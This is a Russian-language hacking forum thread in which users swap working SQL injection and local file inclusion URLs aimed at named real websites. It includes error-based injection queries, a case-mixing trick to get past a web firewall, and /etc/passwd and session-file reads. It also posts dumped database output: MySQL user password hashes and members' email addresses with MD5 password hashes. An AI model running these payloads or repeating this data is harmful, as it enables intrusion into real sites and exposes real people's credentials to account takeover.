Code: http://www.venen-kur.info/index.php?id=1319&lang=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+ в чем трабл?
Code: System information: ----------------------------------------- base:db242799363 basedir:/usr/local/mysql-5.0.81-linux-i686-glibc23/ os:pc-linux-gnu ver:5.0.81-log datadir:/db/mysql/ tmpdir:/var/tmp ----------------------------------------- Tables in information_schema.tables - 29 ----------------------------------------- COLLATIONS COLUMNS COLUMN_PRIVILEGES ROUTINES SCHEMA_PRIVILEGES TABLES TABLE_PRIVILEGES USER_PRIVILEGES cms_languages cms_pages cms_settings user_functions user_groups user_platforms CHARACTER_SETS COLLATION_CHARACTER_SET_APPLICABILITY KEY_COLUMN_USAGE PROFILING SCHEMATA STATISTICS TABLE_CONSTRAINTS TRIGGERS VIEWS cms_media cms_related cms_trees user_group_functions user_in_group user_users ----------------------------------------- Table [ user_users ] ----------------------------------------- Database for user_users: example.com Number of columns in example.com.user_users: 9 Columns in example.com.user_users username platform_id is_superuser first_login session_key id email password session ---------- не вижу никаких проблем
ну вообще да)) PS: Code: http://www.venen-kur.info/index.php?id=1319&lang=(select+1+from+(select+count(0),concat((select+password+from+user_users+limit+0,1),floor(rand(0)*2))+from+user_users+group+by+2)a)--+
net ti zdelal concat_ws%28 username,0x3a,password%29 a vidimo tolko :jmvN/m90uBX8OHg a eto sto login ili parol ?? a zacem tolko eto ?
Помогите плиз: Вот php инъекция: Code: http://www.partnersinpreservation.com/boston/index.php?sec=../../../../../../../../../../../../../etc/passwd%00&locID=16 нашел там PHPSESSID он там j7h4hqb6d43c1f0e3bc84volf6 вбиваю Code: http://www.partnersinpreservation.com/boston/index.php?sec=../../../../../../../../../../../../../tmp/sess_j7h4hqb6d43c1f0e3bc84volf6 ничего нет в какой еще директории может быть файл сессии?
Лучше вот это поизучай: Code: http://www.partnersinpreservation.com/boston/index.php?sec=/proc/self/status%00 http://www.partnersinpreservation.com/boston/index.php?sec=/etc/httpd/conf/httpd.conf%00 http://www.partnersinpreservation.com/boston/index.php?sec=/proc/version%00 https://forum.antichat.net/showpost.php?p=1088072&postcount=11
стандартная скуль http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220%27 но union и select режется модулем NukeSentinel http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220+and+substring%28version%28%29,1,1%29=5 в подзапросах также режется select как обойти?
Например так Code: http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=-220+unIoN+SeLeCt+1,2+--+
Кто может дать хорший и мощный скрипт што бы дамп БД на 3 гига слить, а то ошибки выдает с такими размерами!!
jecka3000, вот как раз он то и выдает ошибки!!! Что 1.0.8b и 2.0.6 несправляються с такими обьемами!!
ммм... Code: http://amkar.properm.ru/info.php?id=-999.9+or%281,1%29=%28select+count%280%29,concat%28%28select+concat%28database%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29 Version: 5.0.51a-24+lenny2-log Current User: properm@localhost Code: [SIZE=5][COLOR=Red][B]Data Bases: [/B][/COLOR][/SIZE] _muzik amkar amkar_fan amore avto baba bikini comix contests euroset forum globass klass kvn led linkation map miss_whatever miss_zima moda muzik muzik_old mysql nebo nevesta newseater permskoe properm reality reality_backup seolib sf spravka spravka2 spravka_backup_2009_10_31 spravka_backup_2009_11_07 [COLOR=Red][SIZE=5][B]User: [/B] [/SIZE][/COLOR] 'root'@'localhost' 'reality'@'localhost' 'realty'@'localhost' 'seo'@'localhost' 'sprvk'@'localhost' 'zabbix'@'localhost' 'spravka'@'localhost' 'properm'@'localhost' 'debian-sys-maint'@'localhost' 'root'@'proserv' 'alya'@'%' 'replication_user'@'%' 'remote_root'@'%' [SIZE=5][COLOR=Red][B] MySQL DB[/B][/COLOR] [/SIZE] [COLOR=DarkGreen][U]User [/U] [U]Password[/U][/COLOR] [B]alya [/B] *8D43FE3D5955DD53B1156534EE7AD854CA88FF24 [B]remote_root [/B] [B]replication_user [/B] *A1DAA5D16F63E661DFFE8FB7E5CCF0E235F0C601 [B]debian-sys-maint [/B] *D6E3AC52927F6BD477ACFEB9E18DCCC3094FFF97 [B]properm [/B] *C58CE76F735421EB5B5BC2BB332CEF2674661499 [B]reality [/B] *66758BD9AE5EFE6F5EFD754A0386969808EE2991 [B]realty [/B] *27D8E13E226CE3F3DB6116796584A6BCF2AA3305 [B]root [/B] *966F8B69DCE8F1383221C7E89C8AB06697332DAC [B]seo [/B] *6063C78456BB048BAF36BE1104D12D547834DFEA [B]spravka [/B] *050376F3855A67F5E2C6514FD3130B31006C1276 [B]sprvk [/B] *30763283C56FC465C0F1F869CD097A5ABDF1F4D9 [B]zabbix [/B] *2D90A69B6136A8DE2E6B87DC14504CE500DA21CF [B]root [/B] *CAC83AB2E75198C3287CD7E81B808F9C6D54B41A [SIZE=5][B]DATABASE:[/B][/SIZE] [COLOR=DarkGreen][B]forum[/B][/COLOR] [SIZE=5][B](TABLES):[/B][/SIZE] fpp_admin_logs fpp_admin_sessions fpp_badwords fpp_cache_store fpp_calendar_events fpp_categories fpp_contacts fpp_css fpp_email_logs fpp_emoticons fpp_faq fpp_files fpp_files_cats fpp_files_comments fpp_files_custentered fpp_files_custfields fpp_files_downloads fpp_files_favorites fpp_files_votes fpp_forum_perms fpp_forum_tracker fpp_forums fpp_groups fpp_languages fpp_macro fpp_macro_name fpp_member_extra fpp_members fpp_messages fpp_moderator_logs fpp_moderators fpp_pfields_content fpp_pfields_data fpp_polls fpp_posts fpp_reg_antispam fpp_search_results fpp_sessions fpp_skin_templates fpp_skins fpp_spider_logs fpp_stats fpp_subscription_currency fpp_subscription_extra fpp_subscription_logs fpp_subscription_methods fpp_subscription_trans fpp_subscriptions fpp_templates fpp_titles fpp_tmpl_names fpp_topic_mmod fpp_topics fpp_tracker fpp_validating fpp_voters fpp_warn_logs ibf_admin_logs ibf_admin_sessions ibf_announcements ibf_attachments ibf_attachments_type ibf_badwords ibf_banfilters ibf_bulk_mail ibf_cache_store ibf_calendar_events ibf_conf_settings ibf_conf_settings_titles ibf_contacts ibf_custom_bbcode ibf_email_logs ibf_emoticons ibf_faq ibf_forum_perms ibf_forum_tracker ibf_forums ibf_groups ibf_languages ibf_mail_error_logs ibf_mail_queue ibf_member_extra ibf_members ibf_members_converge ibf_message_text ibf_message_topics ibf_moderator_logs ibf_moderators ibf_pfields_content ibf_pfields_data ibf_polls ibf_posts ibf_reg_antispam ibf_search_results ibf_sessions ibf_skin_macro ibf_skin_sets ibf_skin_templates ibf_skin_templates_cache ibf_spider_logs ibf_subscription_currency ibf_subscription_extra ibf_subscription_logs ibf_subscription_methods ibf_subscription_trans ibf_subscriptions ibf_task_logs ibf_task_manager ibf_titles ibf_topic_mmod ibf_topics ibf_topics_read ibf_tracker ibf_upgrade_history ibf_validating ibf_voters ibf_warn_logs [B][SIZE=5][COLOR=Red]Table:[/COLOR] [/SIZE][/B][B][COLOR=DarkGreen]fpp_members[/COLOR][/B] [SIZE=5]email [CENTER]password[/CENTER] [RIGHT]name[/SIZE][/RIGHT] test@localhost.com [RIGHT]chucha[/RIGHT] pn@reaktive.ru 7277da89be64a89aa02a2d7423a0c05c Guest red_ma@mail.ru 81dc9bdb52d04dc20036dbd8313ed055 Juissy vsv1407@yandex.ru 1406e7afb3eb1f83b4bd4e310cee7fc6 magic ca@properm.ru 287e9593819b2fcdf9945e7ccacd637d reaktive pn@reaktive.ru 72fed2b8265919690c815f0316b346cc scbsncks ve@properm.ru b0baee9d279d34fa1dfd71aadb908c3f wer stasne@yandex.ru 48309aa13d9d9497b097495188b2863a Николай
посмотрел на phpinfo() там magic_quotes_gpc в local value ON а в master value OFF.. и теперь ON или OFF ??